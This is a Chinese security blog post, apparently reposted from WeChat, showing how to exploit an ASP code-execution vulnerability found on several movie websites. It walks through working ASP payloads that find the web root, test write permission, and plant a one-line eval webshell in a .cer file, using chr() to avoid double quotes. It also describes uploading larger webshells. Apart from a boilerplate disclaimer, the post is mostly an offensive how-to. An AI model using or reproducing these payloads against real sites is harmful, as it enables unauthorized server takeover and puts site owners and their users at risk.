asp 代码执行如何写webshell注意事项

admin 2024年12月20日10:08:54评论8 views字数 1111阅读3分42秒阅读模式

前言

在修复工具bug中我看到软件扫描的结果。存在十几个asp电影网站的代码执行漏洞。我估计可能存在误报。于是乎测试了一下发现不存在误报。另外尝试使用蚁剑等工具直接连接发现报错。所以有必要写一篇文件我们有一个代码执行的点如何写shell。下面开始正文

实战写webshell

下图软扫描结果密码为a的就是

asp 代码执行如何写webshell注意事项

软件扫描结果

我们测试一下看看是否是误报

asp 代码执行如何写webshell注意事项

不存在误报

不存在误报但是使用蚁剑这些都连接不上。这时候就需要写shell了。写shell需要知道绝对路径我们获取一下绝对路径

asp

response.write(Server.MapPath("/"))
asp 代码执行如何写webshell注意事项

获取web根路径

这时候我们看根目录有没有权限写入文件

asp

a=Server.CreateObject("Scripting.FileSystemObject").CreateTextFile("D:\xxxx\test.txt",True).Write("test")

根目录写入测试文件

asp 代码执行如何写webshell注意事项

根目录写入测试文件

访问看看访问那直接写shell。访问成功说明根目录可写。如果访问404那么根目录不可写在找其他目录

asp 代码执行如何写webshell注意事项

测试文件

试发现只要是asp的后缀名称都是写入失败的我就不展示 了。那么我们可以写入cer这些后缀。并且写入的时候如果出现双引号”” 会报错我们可以绕过
写马

asp

Server.CreateObject("Scripting.FileSystemObject").CreateTextFile("D:\xx\test.cer",True).Write("<%25eval(request(chr(97)))%25>") 马子里面没有双引号直接绕过
asp 代码执行如何写webshell注意事项

写shell截图

使用cknife 连接 。 蚁剑这种连接不上。当然连接以后你要上传文件可能会出问题这种简单的一句话不是长久之计。我们要写写那种小马

asp 代码执行如何写webshell注意事项

写入小马

小马我就不贴了。自己修改一下就行了注意 双引号和换行这些这时候我们访问一下看看。使用url编码就行了
小马写入成功

asp 代码执行如何写webshell注意事项

小马写入成功

我们利用这个在写入一个小马。这个马是明小子工具里面的马我们抠出来这个确实好用。

asp 代码执行如何写webshell注意事项

写入马子

最后写一个大马怀旧一下。这个马应该是有个后门可以爆出密码。这些都无所谓主要是怀旧一下哈哈哈

asp 代码执行如何写webshell注意事项

致我们逝去的青春

asp 代码执行如何写webshell注意事项

致我们逝去的青春

总结

现在网站是越来越安全了。基本靠之前的手法搞很难搞了。另外现在waf比较多你要是一点代码都不会那么你将很被动。之前一个工具或者批量工具可以日站的日子没那么多了。现在需要人工配合工具。单纯靠工具getshell那是很费劲的。所以可以适当学习一门编程语言。

asp 代码执行如何写webshell注意事项

本文内容来自网络,如有侵权请联系删除

原文始发于微信公众号(网络安全者):asp 代码执行如何写webshell注意事项

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月20日10:08:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   asp 代码执行如何写webshell注意事项https://cn-sec.com/archives/3526611.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息